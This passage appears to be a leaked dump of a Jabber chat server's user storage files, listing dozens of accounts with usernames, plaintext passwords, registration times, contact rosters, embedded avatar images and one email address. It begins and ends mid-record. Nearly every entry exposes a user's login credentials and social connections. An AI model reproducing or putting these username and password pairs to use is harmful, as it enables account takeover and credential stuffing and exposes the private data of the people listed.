stamp='20100730T20:37:19'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><N><FAMILY/> <GIVEN/> <MIDDLE/> </N> <ORG><ORGNAME/> <ORGUNIT/> </ORG> <FN/> <URL/> <TITLE/> <NICKNAME/> <PHOTO><TYPE>image/jpeg</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAIAAADYYG7QAAAXYUlEQVR42i2XCZRbV5nny6WtpNIuPent70lv35+kKqtUkkpVJan2fXNVucpLed+w4yW2E8dxbLezeI/t2ImBxIRAAuSQEE7oJk2zJXRgzoQtaZrDGeYMA909mSYN4dDQsc3MJ5NzPum85d77fvf7/t93720aGRmpVMq9veVqtVitFnqrpZ7eUrXWVauXq7VSL1xXS319pXq9WKuWa9WuWq1Yr3cODBYHBorwvL+/Alavl8H6+7qGBopjY/nR0a5aX3d3rdQYE0boLff2NKxa7YRmcAvjwCvo3tfX6NvXVxgcLPf3d01PDzdVKpVisdDebufzVkeHlc9n8qszhUKu0JntKGTgtlCwi8XGf0dHBqxQsIpFu1y2S6...AAAElFTkSuQmCC</BINVAL></PHOTO> <EMAIL><HOME/><INTERNET/><PREF/><USERID/> </EMAIL> <TEL><PAGER/><WORK/><NUMBER/> </TEL> <TEL><CELL/><WORK/><NUMBER/> </TEL> <TEL><VOICE/><WORK/><NUMBER/> </TEL> <TEL><FAX/><WORK/><NUMBER/> </TEL> <TEL><PAGER/><HOME/><NUMBER/> </TEL> <TEL><CELL/><HOME/><NUMBER/> </TEL> <TEL><VOICE/><HOME/><NUMBER/> </TEL> <TEL><FAX/><HOME/><NUMBER/> </TEL> <ADR><WORK/><PCODE/> <REGION/> <STREET/> <CTRY/> <LOCALITY/> </ADR> <ADR><HOME/><PCODE/> <REGION/> <STREET/> <CTRY/> <LOCALITY/> </ADR> </vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281222880' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> cr4ck.xml <xdb><query xmlns='jabber:iq:last' last='1280843048' xdbns='jabber:iq:last'>Registered</query><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>hahaha</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cr4ck</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:44:08'>registered</x></query><foo xdbns='jabber:x:offline' xmlns='jabber:x:offline'><message from='jabber-swissfaking.net' to='cr4ck@jabber-swissfaking.net'> <subject>Welcome!</subject> <body>Welcome to the Jabber server -- we hope you enjoy this service! For information about how to use Jabber, visit the Jabber User's Guide at http://jabbermanual.jabberstudio.org/</body> <x xmlns='jabber:x:delay' from='cr4ck@jabber-swissfaking.net' stamp='20100803T13:44:08'>Offline Storage</x></message></foo></xdb> crankz.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>muttertier11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>crankz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:23:54'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAIAAAABc2X6AAAAA3NCSVQICAjb4U/gAAAXyklEQVR42sV8XY/jRpblIXlFHanoLNou72T3VA9ysL0LA9sP/dALLPZp//q+zeM...uQmCC</BINVAL></PHOTO></vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='freakout@jabber-swissfaking.net' name='Freakout' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='Syntax' subscription='from' ask='subscribe'><group>Jabber - Swissfaking</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281266160' xdbns='jabber:iq:last'>Disconnected</query></xdb> cryten.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>54342101</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cryten</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:41:15'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280835782' xdbns='jabber:iq:last'/></xdb> darkfunny.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Master1993</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>darkfunny</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T15:07:57'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280934820' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='to' subscribe=''><group>Friends</group></item></query></xdb> dotsyn.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>ownage</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>dotsyn</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:47:52'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281275221' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> el!t3.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>huren1</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>el!t3</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:39:06'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280843826' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> fickmaus.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>t9N#1~R\dKd6</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>fickmaus</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T18:12:17'>registered</x></query><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><query xmlns='jabber:iq:last' last='1281226381' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>swiss</group></item><item jid='crankz@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='freakout@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='racketeer@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' subscription='from'/><item jid='conference.localhost' subscription='from' ask='subscribe'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='glycerin@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query></xdb> flash.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>12SchneSi</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>flash</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T19:24:16'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280949991' xdbns='jabber:iq:last'/></xdb> freakout.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Ghana11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>freakout</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T10:13:13'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280922217' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='Afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> glycerin\40jabber-swissfaking.net.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kevin123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>glycerin\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100808T11:37:30'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='racketeer@jabber-swissfaking.net' name='Racketeer' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281295248' xdbns='jabber:iq:last'/></xdb> hackthenet.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>sonne123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hackthenet</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T21:49:48'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280918275' xdbns='jabber:iq:last'/></xdb> hans-wurst.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>volkan</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hans-wurst</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:45:39'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280956100' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='both'><group>Swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query></xdb> holzmen.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>jabing</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>holzmen</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:52:11'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955549' xdbns='jabber:iq:last'/></xdb> jamyla\40jabber-swissfaking.net.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>2wsx6zhn</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>jamyla\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:58:39'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281209105' xdbns='jabber:iq:last'/></xdb> kappy777.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kappy777</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kappy777</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T17:44:43'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280513424' xdbns='jabber:iq:last'/></xdb> kluless.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>wtf!1337</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kluless</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100805T11:37:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281008315' xdbns='jabber:iq:last'/></xdb> luigi100.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>frauke</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>luigi100</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T03:25:49'>registered</x></query><query xmlns='jabber:iq:last' last='1281300897' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> naik.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>c15g4</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>naik</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:15:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281007640' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='annie90@jabber.ccc.de' name='' subscription='both'><group>Jabber</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='from' ask='subscribe'><group>Buddies</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> nitex.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>19083862</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>nitex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:37:54'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281271005' xdbns='jabber:iq:last'/></xdb> racketeer.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>neumsche</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>racketeer</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T13:32:38'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='' subscription='to'><group>swiss</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='both'><group>swiss</group></item></query><query xmlns='jabber:iq:last' last='1281291383' xdbns='jabber:iq:last'>Disconnected</query></xdb> s0xtech.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>s0xy00</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>s0xtech</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T07:19:17'>registered</x></query><query xmlns='jabber:iq:last' last='1280825558' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> sinned.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>vollidiot</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>sinned</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T19:03:31'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280862994' xdbns='jabber:iq:last'/></xdb> st3ffl0r.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>HanZ123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>st3ffl0r</username><name>Ich</name><email>iamweasel@marsmail.de</email><x xmlns='jabber:x:delay' stamp='20100805T11:28:40'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAF8AAABgCAIAAAD0AjnaAAAAA3NCSVQICAjb4U/gAAAgAElEQVR42oy8WZM...Mv9pCZHqyIEyWcPpVmUv22TEF3l1Kny8Js4m7WTLwiBvyVZn+a5hF/ENYv/jETXn6+WbfO0vYK7nQ1q+MOm5Hc8Nuu23wn2TSuNvKNqKcLc8efYMALyFjEOFaAQHV45gl85/x2yGLznPZ6jM75ju8LsTILanf/GAL4Ybff0qZ9Y8DcN5tCO3/QgU3B1qvXv3n9cgfNLl5Yvlb3PGXttQkAzPbZSNvvmq5yDV8b+PHjYIo8n1+vLpv2es77Hg1wvny59K8JuP+T9PTAv9D/H9sBRgei4KAAAAAElFTkSuQmCC</BINVAL></PHOTO></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281011278' xdbns='jabber:iq:last'>Disconnected</query></xdb> syntax\40jabber-swissfaking.net.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>seckin!kilic!91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntax\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:44:55'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'><message id='IoS3Q-21' to='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' from='naik@jabber-swissfaking.net/spark'><x xmlns='jabber:x:event'/><x xmlns='jabber:x:delay' from='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' stamp='20100805T11:07:06'>Offline Storage</x></message></foo><query xmlns='jabber:iq:last' last='1280928948' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='to' subscribe=''><group>Swiss</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='to'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='to' subscribe=''><group>Swiss</group></item><item jid='el!t3@jabber-swissfaking.net' name='eL!t3' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='yaboybigt@jabber-swissfaking.net' name='yaboybigT' subscription='to'><group>Swiss</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='both'><group>Swiss</group></item><item jid='syntex@jabber-swissfaking.net' name='syntex' subscription='both'><group>Swiss</group></item></query></xdb> syntex.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>swissjabber</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:33:58'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281301960' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> theird21.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>00025879</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>theird21</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:05:17'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280927487' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> the|biggie.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>aggro123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>the|biggie</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T20:33:39'>registered</x></query><query xmlns='jabber:iq:last' last='1280970373' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='from' ask='subscribe'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> trickz.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>crazyfrog1234</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>trickz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T21:41:38'>registered</x></query><res id='spark'/><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='from'/><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='crankz@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281303248' xdbns='jabber:iq:last'>Disconnected</query></xdb> w!cked.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>fvcxy--</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w!cked</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T16:19:22'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280852527' xdbns='jabber:iq:last'>Disconnected</query></xdb> w00dka.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>as_tave_myliu</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w00dka</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T18:07:26'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281222732' xdbns='jabber:iq:last'/></xdb> weareone.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Amstaff</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>weareone</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:30:36'>registered</x></query><res id='spark'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='dotsyn@jabber-swissfaking.net' name='dotsyn' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='donteron@thesecure.biz' subscription='from'/><item 